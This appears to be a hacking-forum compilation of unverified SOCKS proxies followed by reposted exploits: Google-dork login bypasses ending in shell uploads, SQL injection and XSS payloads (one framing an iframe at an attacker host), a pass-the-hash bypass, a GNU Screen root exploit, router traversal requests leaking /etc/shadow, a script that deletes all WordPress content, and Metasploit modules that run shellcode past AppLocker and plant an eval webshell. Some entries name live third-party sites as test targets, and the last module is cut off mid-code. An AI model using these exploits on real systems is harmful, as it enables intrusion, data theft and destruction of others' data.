[Proxies Socks4/5 Verificate]

46.99.133.241:1080
66.58.244.108:24705
71.228.211.89:17002
45.63.90.226:6789
162.254.168.154:56499
68.7.156.247:13623
104.238.183.182:6789
67.197.149.140:18293
104.219.112.114:52862
208.104.74.191:27899
47.35.38.116:57216
108.218.207.108:30049
183.232.25.100:4080
107.151.129.249:1080
68.178.128.170:18749
45.63.82.190:6789
24.2.70.116:24182
180.92.239.217:1080
97.82.41.68:40641
45.63.88.229:6789
72.243.180.159:45554
24.196.134.76:18527
186.121.206.234:1080
67.197.28.10:43491
45.63.83.124:6789
64.126.70.72:53473
8.30.102.50:45554
76.8.208.230:45554
204.248.125.246:45554
104.207.150.81:6789
184.20.102.255:1080
66.167.193.138:22010
45.32.130.95:6789
47.208.147.42:27181
63.240.250.44:50652
67.170.49.111:29381
223.25.99.163:1180
47.222.33.206:55495
76.29.93.253:50999
73.25.253.84:25242
104.238.182.74:6789
64.121.199.87:20985
24.189.131.7:19821
208.74.33.114:10223
45.63.88.181:6789
173.208.137.46:6789
24.178.207.30:10379
75.118.153.228:10200
208.104.74.89:27677
45.32.130.120:6789
27.123.1.162:1080
216.10.224.223:45554
24.74.75.139:34070
96.237.161.130:46555
117.74.120.81:1080
74.75.164.255:10200
97.99.103.153:53293
75.151.213.85:3366
162.213.178.102:45554
68.64.229.84:45554
36.66.213.167:1080
45.63.88.187:6789
208.104.74.229:27809
47.35.79.9:46845
24.240.255.93:12666
45.32.139.243:6789
100.42.158.187:45554
75.76.230.236:45554
104.238.180.134:6789
208.104.232.210:52886
72.91.84.235:51815
209.159.251.12:56511
67.197.232.209:23864
104.238.183.133:6789
97.77.75.181:28111
73.181.120.114:59152
216.24.77.41:17382
45.32.213.237:6789
45.63.90.33:6789
45.63.89.78:6789
216.212.236.240:45554
54.215.184.209:34646
76.29.6.56:40178
73.199.232.15:30495
45.32.141.69:6789
91.195.103.172:31336
73.15.240.216:28416
76.94.99.191:63798
76.25.126.209:58399
45.63.84.133:6789
24.16.89.71:38784
45.32.130.189:6789
45.32.137.112:6789
68.117.143.146:17472
68.81.198.11:21645
45.32.128.60:6789
190.129.1.141:46690
175.143.94.161:10233
123.207.167.125:1080
67.197.251.54:20191
104.244.223.85:24950
24.72.213.167:45554
174.141.178.158:45554
63.142.208.138:14803
45.32.141.196:6789
24.93.138.78:10200
104.241.13.16:10200
208.104.74.50:27766
67.197.236.88:22961
45.55.28.39:21532
104.220.172.192:14811
70.99.133.238:15466
72.47.70.110:55446
104.244.140.93:45554
73.13.150.205:12327
208.111.120.173:10200
67.197.29.170:43075
68.225.192.228:21202
73.59.46.201:45554
103.195.142.88:9999
173.26.244.42:36839
67.197.253.126:18583
67.197.232.59:24018
64.4.99.16:62915
67.197.29.186:43091
180.178.104.178:1080
45.55.28.39:24609
66.110.216.105:39431
64.184.5.7:45554
68.198.171.167:29702
104.219.112.98:16329
24.249.92.200:45554
45.63.94.22:6789
45.63.85.71:6789
45.32.136.150:6789
70.234.238.97:8088
45.63.93.251:6789
96.27.214.206:45554
64.185.49.177:45554
115.133.125.17:55363
45.63.91.180:6789
47.88.77.171:1080
67.197.252.158:18807
67.50.240.12:26089
104.238.180.191:6789

 

[Elsfa7-110 Bypass Login Vulnerability]

Dork: intext:"Powered by ENS Consultants"
|=============================================================|
|
|
| Exploit Title :ENS Consultants Bypass Login Vulnerability
|
|
| Google Dork intext:"Powered by ENS Consultants"
| Tested on : Paroot
|
|======================================|
|
| Tutorial :
|
| Search The Dork Or Go To Vendor HomePage And Select Your Target
| Then Go To Admin Panel At : /admin/login.php
| And Open Noredirect Add-Ons And Click On "Add"
| Paste The Target With ^ Character : ^Target
| At Last Change Url To : site/admin/index.php
| Upload Your Shell And Enjoy !
|
|=============================================================|

[Joomla Abstract 2.1 SQL Injection]

# # # # #
# Exploit Title: Joomla! Component Abstract v2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_abstract
# Date: 02.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/abstract-manager/
# Demo: http://demo.joomla6teen.com/abstractmanager
# Version: 2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&layout=detail&pid=

	# http://localhost/[PATH]/index.php?option=com_abstract&view=conferences&task=contactEmail&pid=[SQL]

	# 1+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1

	# # # # #

[PASSFILE]

passfile-ul care tu il cauti defapt e un wordlist ....sau password list .... ti l poti face singur fara stres depinzand de tarile care vrei sa le scanezi sau daca vrei sa dai random poti folosi ceva general care le poti gasi la un singur search pe google

[PHPShell 2.4 Cross Site Scripting]

[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt
[+] ISR: ApparitionSec



Vendor:
==========
sourceforge.net/projects/phpshell/
phpshell.sourceforge.net/



Product:
=============
PHPShell v2.4


Vulnerability Type:
====================
Cross Site Scripting



CVE Reference:
==============
N/A



Security Issue:
================
Multiple cross site scripting entry points exist in PHPShell undermining
the integrity between users browser and server.
Allowing remote attackers to bypass access controls such as the same-origin
policy. If an authenticated user clicks an attacker
supplied link.

XSS issue is made possible because PHPShell calls print
$_SERVER['PHP_SELF'] on the main HTML form. Since PHP_SELF references URL,
PHPShell simply reads our XSS payload in the URL and echoes it back to
client.

<form name="shell" enctype="multipart/form-data" action="<?php
print($_SERVER['PHP_SELF']) ?>" method="post">

Since PHPShell purpose is to execute system commands this XSS vulnerability
can potentially become a 'Remote Command Execution'
vulnerability. Moreover, this XSS issue can also potentially leverage a
Session Fixation vulnerability also present in PHPShell.


Reference:
"
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
"


Tested successfully in Firefox


Exploit/POC:
=============

XSS 1)

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

OR Inject IFRAME to phish and steal credentials, you get the idea.

http://VICTIM-IP/phpshell-2.4/phpshell.php/%22/%3E%3Cscript%3Evar%20frm=document.createElement('IFRAME');document.body.appendChild(frm);frm.setAttribute(%22width%22,%22900%22);frm.setAttribute(%22height%22,%22900%22);frm.src=%22http://ATTACKER-IP.com%22%3C/script%3E%3C!--



XSS 2) http://VICTIM-IP/phpshell-2.4/phpshell.php

On the Login Authentication HTML form 'username' input field

" onMousemove="alert(document.cookie)

enter a password and hit Enter.




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
===============================
Vendor Notification: No reply
In addition the INSTALL file "Bugs?  Comments?" Tracker System link is HTTP
404
http://sourceforge.net/tracker/?group_id=156638
February 18, 2017 : Public Disclosure

[Cisco ASA WebVPN CIFS Handling Buffer Overflows]

Cisco ASA: Buffer overflows in WebVPN cifs handling

CVE-2017-3807


The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: <a href="https://portal/+webvpn+/CIFS_R/share_server/share_name/file" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/share_server/share_name/file</a>.

When someone logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates 2 C strings in a http_cifs_context struct:

http_cifs_context:
+0x160 char* file_dir
+0x168 char* file_name

These strings are copied in various places, but is done incorrectly. For example, in ewaURLHookCifs, there is the following pseudocode:

filename_copy_buf = calloc(1LL, 336LL);
net_handle[10] = filename_copy_buf;
if ( filename_copy_buf )
{
src_len = _wrap_strlen(filename_from_request);
if ( filename_from_request[src_len - 1] == ('|') )
{
// wrong length (src length)
strncpy((char *)filename_copy_buf, filename_from_request,
src_len - 1);
}

In this case, a fixed size buf (|filename_copy_buf|) is allocated. Later, strncpy is called to copy to it, but the length passed is the length of the src string, which can be larger than 366 bytes. This leads to heap overflow.

There appear to be various other places where the copying is done in an unsafe way:

http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.

http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.

Possibly http_add_query_str_from_context. There are probably others that I missed.

Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.

Repro:

Login to WebVPN portal, navigate to:

<a href="https://portal/+webvpn+/CIFS_R/server/name/" title="" class="" rel="nofollow">https://portal/+webvpn+/CIFS_R/server/name/</a> followed by 500 'A's.

("server" and "name" may be passed verbatim)

*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]

This was tested on 9.6(2)

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

[Sawmill Enterprise v8.7.9 Pass The Hash Authentication Bypass]

[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec



Vendor:
===============
www.sawmill.net



Product:
========================
Sawmill Enterprise v8.7.9

sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0

Sawmill is a powerful heirarchical log analysis tool that runs on every major platform.


Vulnerability Type:
===================================
Pass the Hash Authentication Bypass



CVE Reference:
==============
CVE-2017-5496



Security Issue:
=====================
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an attacker who gains access to the hashed user account passwords
can login to the Sawmill interface using the raw MD5 hash values, allowing attackers to bypass the work of offline cracking
account password hashes.


This issue usually is known to affect Windows systems e.g. (NT Pass the Hash/Securityfocus, 1997). However, this vulnerability can also
present itself in a vulnerable Web application.

Sawmill account password hashes are stored under LogAnalysisInfo/ directory in "users.cfg".

e.g.

users = {
root_admin = {
username = "admin"
password_checksum = "e99a18c428cb38d5f260853678922e03"
email_address = ""


This config file is stored local to the Sawmill application. However, if an attacker gains access to a backup of the config that is
stored in some other location that is then compromised, it can lead to subversion of Sawmills authenticaton process.

Moreover, since 'users.cfg' file is world readble a regular non Admin Windows user who logs into the system running sawmill can now grab
a password hash and easily login to the vulnerable application without the needing the password itself.


How to test?


Sawmill running (default port 8988), log off Windows and switch to a "Standard" Windows non Administrator user.

1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.

2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.


Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no salt.


e.g.

password: abc123
MD5 hash:
e99a18c428cb38d5f260853678922e03



Disclosure Timeline:
=====================================
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned : January 20
Request status : January 26
Vendor: Fix avail later in year still no ETA
Inform vendor public disclose date
February 18, 2017 : Public Disclosure



Network Access:
===============
Remote



Impact:
======================
Information Disclosure
Privilege Escalation



Severity Level:
================
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

[SQLi in Dejabú's Scripts]

#############################################################
# Application Name : SQLi in Dejabú's Scripts
# Vulnerable Type : SQL İnjection
# Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id=
# Author: fl3xpl0it a.k.a KurokoTetsuya
# Date: 20.02.2017
# Tested On Demo Sites:
[+] http://www.cepaproduccion.com/content/news.php?id=1114'
[+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2
# Warning: If you not found SQLi , you try SQLi other parameter.
# Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi)
# Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected)
#############################################################

[Polycom VVX Web Interface Privilege Escalation]

# Exploit Title: Polycom VVX Web Interface - Change Admin Password as User
# Date: January 26, 2017
# Exploit Author: Mike Brown
# Vendor Homepage: http://www.polycom.com/
# Software Link: http://downloads.polycom.com/voice/voip/uc_sw_releases_matrix.html
# Version: Polycom vvx 410 UC Software Version: 5.3.1.0436
# CVE : N/A

# This module requires the user to have access to the "User" account (Default User:123) in the Polycom VoIP phone's web interface.
# The user can use the following steps to escalate privileges and become the Admin user to reveal menu items internal IP addresses
# and account information.

1. Login with the "User" Account.
2. Navigate to Settings > Change Password.
3. Fill in "Old Password" with the current "User" password.
4. Fill in "New Password" with the new "Admin" account password, and confirm.
5. Using a live HTML editor, inspect the old password field. you will see:
<input id="olduserpswd" name="122" isrebootrequired="false" helpid="525" value="" paramname="device.auth.localUserPassword"
default="" config="????" variabletype="string" min="0" max="32" maxlength="32" hintdivid="userAccountConf.htm_1" type="password">
6. Change the name field to "120"
7. Click "Save"
8. An error will be shown on screen but you can now log into the Admin account with the new password.
 
	

 

[GNU Screen 4.5.0 Local Root Privilege Escalation]

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

 

[TM RG4332 2.7.0 Arbitrary File Disclosure]

# Exploit Title: TM RG4332 Wireless Router Traversal Arbitrary File Read
# Date: 27/01/2017
# Exploit Author: Saeid Atabaki
# Version: RG4332_V2.7.0
# Tested on: RG4332 with mini_http 1.19
 
  
  
= 1 =============================================================
  
GET /cgi-bin/webproc?getpage=html/../../../etc/passwd&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
  
---
  
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
 
 
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
 
  
= 2 =============================================================
  
GET /cgi-bin/webproc?getpage=html/../../../etc/shadow&var:menu=status&var:page=system_msg HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: sessionid=17746062; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; language=en_us; Lan_IPAddress=192.168.0.1; sys_UserName=admin; expires=Mon, 31-Jan-2050 16:00:00 GMT
Connection: close
 
---
 
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=17746062;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
 
 
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

 

[WordPress Bulk Delete 5.5.3 Privilege Escalation]

* Exploit Title: Bulk Delete [Privilege Escalation]
* Discovery Date: 2016-02-10
* Exploit Author: Panagiotis Vagenas
* Author Link: https://twitter.com/panVagenas
* Vendor Homepage: http://bulkwp.com/
* Software Link: https://wordpress.org/plugins/bulk-delete/
* Version: 5.5.3
* Tested on: WordPress 4.4.2
* Category: WebApps, WordPress


Description
-----------

_Bulk Delete_ plugin for WordPress suffers from a privilege escalation
vulnerability. Any registered user can exploit the lack of
capabilities checks to perform all administrative tasks provided by
the _Bulk Delete_ plugin. Some of these actions, but not all, are:

- `bd_delete_pages_by_status`: deletes all pages by status
- `bd_delete_posts_by_post_type`: deletes all posts by type
- `bd_delete_users_by_meta`: delete all users with a specific pair of
meta name, meta value

Nearly all actions registered by this plugin can be performed from any
user, as long as they passed to a query var named `bd_action` and the
user has a valid account. These actions would normally require
administrative wrights, so we can consider this as a privilege
escalation vulnerability.

PoC
---

The following script will delete all pages, posts and users from the
infected website.


```
#!/usr/bin/python3

########################################################################
########
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it wi
ll
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
########################################################################
########

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

l = requests.post(loginUrl, data=loginPostData)

if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
    print("Couldn't acquire a valid session")
    exit(1)

loggedInCookies = l.history[0].cookies

def do_action(action, data):
    try:
        requests.post(
            adminUrl + '?bd_action=' + action,
            data=data,
            cookies=loggedInCookies,
            timeout=30
        )
    except TimeoutError:
        print('Action ' + action + ' timed out')
    else:
        print('Action ' + action + ' performed')

print('Deleting all pages')
do_action(
    'delete_pages_by_status',
    {
        'smbd_pages_force_delete': 'true',
        'smbd_published_pages': 'published_pages',
        'smbd_draft_pages': 'draft_pages',
        'smbd_pending_pages': 'pending_pages',
        'smbd_future_pages': 'future_pages',
        'smbd_private_pages': 'private_pages',
    }
)

print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
    'post',
    'page',
    'attachment',
    'revision',
    'nav_menu_item'
]})

print('Deleting all users')
do_action(
    'delete_users_by_meta',
    {
        'smbd_u_meta_key': 'nickname',
        'smbd_u_meta_compare': 'LIKE',
        'smbd_u_meta_value': '',
    }
)

exit(0)

```

Solution
--------

Upgrade to v5.5.4

Timeline
--------

1. **2016-02-10**: Requested CVE ID
2. **2016-02-10**: Vendor notified through wordpress.org support forums
3. **2016-02-10**: Vendor notified through the contact form at bulkwp.com
4. **2016-02-10**: Vendor responded and received details about the issue
5. **2016-02-10**: Vendor verified vulnerability
6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue

 

exploit source : packetstormsecurity.com

[AppLocker Execution Prevention Bypass]

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::FileDropper
include Msf::Post::File

def initialize(info={})
super(update_info(info,
'Name' => 'AppLocker Execution Prevention Bypass',
'Description' => %q{
This module will generate a .NET service executable on the target and utilise
InstallUtil to run the payload bypassing the AppLocker protection.

Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Casey Smith', # Original AppLocker bypass research
'OJ Reeves' # MSF module
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> 'Aug 3 2015',
'References' =>
[
['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
]
))

register_options([
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
'INSTALLUTIL', %w(INSTALLUTIL)])])
end

# Run Method for when run command is issued
def exploit
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
end
end

# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

if datastore['TECHNIQUE'] == 'INSTALLUTIL'
execute_installutil
end
end

def execute_installutil
envs = get_envs('TEMP', 'windir')

dotnet_path = get_dotnet_path(envs['windir'])
print_status("Using .NET path #{dotnet_path}")

cs_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.cs"
exe_path = "#{envs['TEMP']}#{Rex::Text.rand_text_alpha(8)}.exe"

installutil_path = "#{dotnet_path}InstallUtil.exe"

print_status("Writing payload to #{cs_path}")
write_file(cs_path, generate_csharp_source)
register_files_for_cleanup(cs_path)

print_status("Compiling payload to #{exe_path}")
csc_path = "#{dotnet_path}csc.exe"
csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")

print_status("Executing payload ...")
vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
register_files_for_cleanup(exe_path)
end

def get_dotnet_path(windir)
base_path = "#{windir}Microsoft.NETFramework#{payload.arch.first == 'x86' ? '' : '64'}"
paths = dir(base_path).select {|p| p[0] == 'v'}
dotnet_path = nil

paths.reverse.each do |p|
path = "#{base_path}#{p}"
if directory?(path) && file?("#{path}InstallUtil.exe")
dotnet_path = path
break
end
end

unless dotnet_path
fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
end

dotnet_path
end

def generate_csharp_source
sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
cs = %Q^
using System;

namespace Pop
{
public class Program { public static void Main() { } }

[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);

public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^

cs
end

end

exploit source : packetstormsecurity.com

[ATutor 2.2.1 SQL Injection / Remote Code Execution]

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution',
'Description' => %q{
This module exploits a SQL Injection vulnerability and an authentication weakness
vulnerability in ATutor. This essentially means an attacker can bypass authenication
and reach the administrators interface where they can upload malcious code.

You are required to login to the target to reach the SQL Injection, however this
can be done as a student account and remote registration is enabled by default.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code
],
'References' =>
[
[ 'CVE', '2016-2555' ],
[ 'URL', 'http://www.atutor.ca/' ] # Official Website
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Mar 1 2016',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']),
OptString.new('USERNAME', [true, 'The username to authenticate as']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
],self.class)
end

def print_status(msg='')
super("#{peer} - #{msg}")
end

def print_error(msg='')
super("#{peer} - #{msg}")
end

def print_good(msg='')
super("#{peer} - #{msg}")
end

def check
# the only way to test if the target is vuln
begin
test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end

if test_injection(test_cookie)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def create_zip_file
zip_file = Rex::Zip::Archive.new
@header = Rex::Text.rand_text_alpha_upper(4)
@payload_name = Rex::Text.rand_text_alpha_lower(4)
@plugin_name = Rex::Text.rand_text_alpha_lower(3)

path = "#{@plugin_name}/#{@payload_name}.php"
register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}")

zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>")
zip_file.pack
end

def exec_code
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", @plugin_name, "#{@payload_name}.php"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
})
end

def upload_shell(cookie)
post_data = Rex::MIME::Message.new
post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name="modulefile"; filename="#{@plugin_name}.zip"")
post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name="install_upload"")
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie,
'agent' => 'Mozilla'
})

if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_1.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla',
})
if res && res.code == 302 && res.redirection.to_s.include?("module_install_step_2.php?mod=#{@plugin_name}")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "module_install_step_2.php?mod=#{@plugin_name}"),
'cookie' => cookie,
'agent' => 'Mozilla',
})
return true
end
end

# auth failed if we land here, bail
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end

def get_hashed_password(token, password, bypass)
if bypass
return Rex::Text.sha1(password + token)
else
return Rex::Text.sha1(Rex::Text.sha1(password) + token)
end
end

def login(username, password, bypass)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "login.php"),
'agent' => 'Mozilla',
})

token = $1 if res.body =~ /) + "(.*)");/
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /; ATutorID=(.*); ATutorID=/
if bypass
password = get_hashed_password(token, password, true)
else
password = get_hashed_password(token, password, false)
end

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_login' => username,
'submit' => 'Login'
},
